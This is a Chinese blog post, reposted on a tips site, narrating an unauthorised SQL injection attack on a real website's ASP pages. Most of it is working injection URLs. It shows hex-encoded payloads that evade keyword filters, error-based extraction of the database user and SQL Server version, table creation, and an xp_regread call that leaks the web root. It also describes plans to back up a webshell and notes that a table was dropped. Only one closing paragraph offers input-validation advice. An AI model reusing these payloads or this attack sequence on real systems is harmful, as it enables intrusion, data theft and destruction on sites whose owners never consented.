最后的战役[第三次注入中国 联盟] -电脑资料

电脑资料 时间:2019-01-01 我要投稿
【www.unjs.com - 电脑资料】

    文:小生

    帮黑夜找一个工具,又去了 基地看了一眼,我晕,又是枫三少的照片挂在上面(n年前就是这样了,三少,挂照片好爽?^-^),我倒!看看黑基有什么注入漏洞先,

最后的战役[第三次注入中国 联盟]

。我找啊找,找到了论坛。看到一个叫《[原创]对中国 联盟的二次渗透》,是某人写的。我直觉告诉我,这个什么中国 联盟应该还有漏洞(别丢鸡蛋,我很少去这样的站)。已经被人黑了2次了,也不差我了吧。我再来!

    地址http://www.chinahacker.com/article/list.asp?id=891,测试开始吧。

    测试一:http://www.chinahacker.com/article/list.asp?id=891’

    返回:你提交的数据有错,不要老喜欢搞我啦,Kender留言

    个人判断:过滤了’

    测试二:http://www.chinahacker.com/article/list.asp?id=891%20and%201=1

    返回:正常

    个人判断:应该可以去死了,只过滤了’。

    而且是mssql的数据库,我最喜欢。然后我想可能还过滤了select之类的吧。这次真是好玩。我想了想用16进制,这里我用了一个工具,是裤衩写的HEXSQL。由于枫三少已经写了有article表了,我是一个很懒的人。提交如下:http://www.chinahacker.com/article/list.asp?id=891%20and%20%28%73%65%6C%65%63%74%20%63%6F%75%6E%74%28%2A%29%20%46%72%6F%6D%20%61%72%74%69%63%6C%65%29%3E%30

    其实就是http://www.chinahacker.com/article/list.asp?id=891 and (select count(*) from article)>0

    返回正常,我是个很喜欢drop表的人来的。看看;能不能先

    http://www.chinahacker.com/article/list.asp?id=891;

    oh,shit,过滤了。再来一下先。

    http://www.chinahacker.com/article/list.asp?id=891%3B,又可以了。

    提醒 联盟一下吧。这里更好玩!http://www.chinahacker.com/soft/show.asp?id=401%20and%20%28%73%65%6C%65%63%74%20%63%6F%75%6E%74%28%2A%29%20%46%72%6F%6D%20%61%72%74%69%63%6C%65%29%3E%30

    玩认真的了。

    连接用户:

    %20and%20%75%73%65%72%3E%30代表 and user>0

    返回[Microsoft][ODBC SQL Server Driver][SQL Server]将 nvarchar 值 'ChinaHacker.com.Article' 转换为数据类型为 int 的列时发生语法错误。

    Sql信息:

    %20and%20%31%3D%28%73%65%6C%65%63%74%20%40%40%56%45%52%53%49%4F%4E%29 代表 and 1=(select @@VERSION)

    返回[Microsoft][ODBC SQL Server Driver][SQL Server]将 nvarchar 值 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4) ' 转换为数据类型为 int 的列时发生语法错误,

电脑资料

最后的战役[第三次注入中国 联盟]》(https://www.unjs.com)。

    用户权限:

    省略n个测试,反正不是sa权限。

    接下来是暴表,暴字段。这里我要感谢一个人,小竹。暴表就舒服多了啊。用不着慢慢猜。

    一暴有这样的表wodoubuzhidaoshuoshenmehao。字段名id,username,password。就差不多了,继续暴,我是很懒的人来的。不会一个一个去猜的。

    不如backup a webshell 吧。

    得到库名为ChinaHacker.com.Article

    创建一个表先http://www.chinahacker.com/article/list.asp?id=891%3B%63%72%65%61%74%65%20%74%61%62%6C%65%20%5B%64%62%6F%5D%2E%5B%78%62%6C%75%65%5D%20%28%5B%35%34%62%6F%62%5D%5B%63%68%61%72%5D%28%32%35%35%29%29%3B%2D%2D

    到绝对路径了

    http://www.chinahacker.com/article/list.asp?id=891%3B%44%45%43%4C%41%52%45%20%40%72%65%73%75%6C%74%20%76%61%72%63%68%61%72%28%32%35%35%29%20%45%58%45%43%20%6D%61%73%74%65%72%2E%64%62%6F%2E%78%70%5F%72%65%67%72%65%61%64%20%27%48%4B%45%59%5F%4C%4F%43%41%4C%5F%4D%41%43%48%49%4E%45%27%2C%27%53%59%53%54%45%4D%5C%43%6F%6E%74%72%6F%6C%53%65%74%30%30%31%5C%53%65%72%76%69%63%65%73%5C%57%33%53%56%43%5C%50%61%72%61%6D%65%74%65%72%73%5C%56%69%72%74%75%61%6C%20%52%6F%6F%74%73%27%2C%20%27%2F%27%2C%20%40%72%65%73%75%6C%74%20%6F%75%74%70%75%74%20%69%6E%73%65%72%74%20%69%6E%74%6F%20%78%62%6C%75%65%20%28%35%34%62%6F%62%29%20%76%61%6C%75%65%73%28%40%72%65%73%75%6C%74%29%3B%2D%2D

    得到绝对路径为:d:\chinahacker

    有个notdown表啊,小路帮我drop了,果然是老手,我还没有想到,小路简直是我偶像,要多多向他学习一下才行。这里要谢谢小路对我的帮忙,谢谢了。

    这次纯粹是为了玩,没有drop表,没有update文章系统。Kender不要找我麻烦。我怕怕。

    我认为,想防止再发生的话。最好就让数字只能是数字好了,搜索那里过滤就照原来一样。具体可以看看小竹的《SQL注入天书 - ASP注入漏洞全接触》的最后那部分的防范处理

最新文章